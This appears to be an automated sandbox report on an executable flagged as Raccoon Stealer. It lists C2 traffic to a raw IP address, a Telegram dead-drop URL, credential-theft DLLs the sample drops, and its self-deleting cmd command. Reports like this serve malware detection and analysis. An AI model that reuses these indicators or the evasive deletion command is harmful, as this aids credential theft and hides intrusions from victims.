Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown	TCP traffic detected without corresponding DNS query: 185.138.164.150

Source: eLZzxG56uH.exe, 00000000.00000003.311406485.000000004C73A000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150/
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	String found in binary or memory: http://185.138.164.150//l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	String found in binary or memory: http://185.138.164.150//l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f
Source: eLZzxG56uH.exe, 00000000.00000003.311477945.0000000001738000.00000004.00000001.sdmp	String found in binary or memory: http://185.138.164.150//l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f.te
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	String found in binary or memory: http://185.138.164.150/D
Source: eLZzxG56uH.exe, 00000000.00000002.314083739.00000000016B1000.00000004.00000020.sdmp	String found in binary or memory: http://185.138.164.150/w
Source: eLZzxG56uH.exe, 00000000.00000002.314083739.00000000016B1000.00000004.00000020.sdmp	String found in binary or memory: http://185.138.164.150/~
Source: eLZzxG56uH.exe, 00000000.00000002.314379264.0000000001758000.00000004.00000020.sdmp	String found in binary or memory: http://185.138.164.150:80//l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6fiimedpic
Source: eLZzxG56uH.exe, 00000000.00000002.314379264.0000000001758000.00000004.00000020.sdmp	String found in binary or memory: http://185.138.164.150:80/F2FB95FBD9F1696ome
Source: qipcap.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: qipcap.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp, nssckbi.dll.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: qipcap.dll.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: qipcap.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: qipcap.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: qipcap.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: qipcap.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.0.dr	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://ocsp.accv.es0
Source: qipcap.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: qipcap.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: qipcap.dll.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://repository.swisssign.com/0
Source: qipcap.dll.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: qipcap.dll.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: qipcap.dll.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: qipcap.dll.0.dr	String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.0.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.0.dr	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: nssckbi.dll.0.dr	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.0.dr	String found in binary or memory: https://repository.luxtrust.lu0
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: eLZzxG56uH.exe, 00000000.00000003.302859980.0000000001746000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: eLZzxG56uH.exe, 00000000.00000003.302859980.0000000001746000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp, eLZzxG56uH.exe, 00000000.00000002.314058859.000000000168A000.00000004.00000020.sdmp	String found in binary or memory: https://t.me/tika31ramencomp
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	String found in binary or memory: https://telegram.org/img/t_logo.png
Source: nssckbi.dll.0.dr	String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.0.dr	String found in binary or memory: https://www.catcert.net/verarrel05
Source: qipcap.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: eLZzxG56uH.exe, 00000000.00000003.311406485.000000004C73A000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.p
Source: eLZzxG56uH.exe, 00000000.00000003.311406485.000000004C73A000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150

Source: unknown

DNS traffic detected: queries for: t.me

Source: global traffic	HTTP traffic detected: GET /tika31ramencomp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic	HTTP traffic detected: GET //l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic	HTTP traffic detected: GET //l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49743 version: TLS 1.2

Source: eLZzxG56uH.exe, 00000000.00000002.314058859.000000000168A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 0.2.eLZzxG56uH.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eLZzxG56uH.exe PID: 3340, type: MEMORYSTR

System Summary:

PE file contains section with special chars

Show sources

Source: eLZzxG56uH.exe	Static PE information: section name: Intel Co
Source: eLZzxG56uH.exe	Static PE information: section name: Intel Co
Source: eLZzxG56uH.exe	Static PE information: section name: Intel Co

Source: eLZzxG56uH.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001F7819	0_2_001F7819
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001E10B1	0_2_001E10B1
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001F628C	0_2_001F628C
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001EA2F9	0_2_001EA2F9
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001FE2E4	0_2_001FE2E4
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001F73C6	0_2_001F73C6
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001DFD36	0_2_001DFD36
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001E06DD	0_2_001E06DD
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001DE014	0_2_001DE014
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0021D011	0_2_0021D011
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001DE857	0_2_001DE857
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001D78B7	0_2_001D78B7
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0020D298	0_2_0020D298
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001DEBE9	0_2_001DEBE9
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_002084BA	0_2_002084BA
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0021A4BD	0_2_0021A4BD
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0020A480	0_2_0020A480
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0020D4CA	0_2_0020D4CA
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001E2D2B	0_2_001E2D2B
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0021A5DD	0_2_0021A5DD
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_00221E42	0_2_00221E42
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001EAE7B	0_2_001EAE7B
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0021DF29	0_2_0021DF29
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0020D72F	0_2_0020D72F
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001D8F0B	0_2_001D8F0B
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001DD704	0_2_001DD704
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_001FD757	0_2_001FD757

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: String function: 00227790 appears 125 times
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: String function: 0020F0F9 appears 75 times
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: String function: 00200940 appears 32 times

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001FF3BE: DeviceIoControl,GetLastError,

0_2_001FF3BE

Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found

Source: eLZzxG56uH.exe, 00000000.00000002.317170645.000000006EBFB000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamenss3.dll8 vs eLZzxG56uH.exe
Source: eLZzxG56uH.exe, 00000000.00000002.316712860.000000006EAC2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll8 vs eLZzxG56uH.exe

Source: eLZzxG56uH.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: sqlite3.dll.0.dr

Static PE information: Number of sections : 18 > 10

Source: eLZzxG56uH.exe	Virustotal: Detection: 23%
Source: eLZzxG56uH.exe	ReversingLabs: Detection: 22%

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\eLZzxG56uH.exe 'C:\Users\user\Desktop\eLZzxG56uH.exe'
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\eLZzxG56uH.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\eLZzxG56uH.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK	Jump to behavior

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

File created: C:\Users\user\AppData\LocalLow\sqlite3.dll

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/68@1/2

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001EA224 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,

0_2_001EA224

Source: softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.0.dr	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
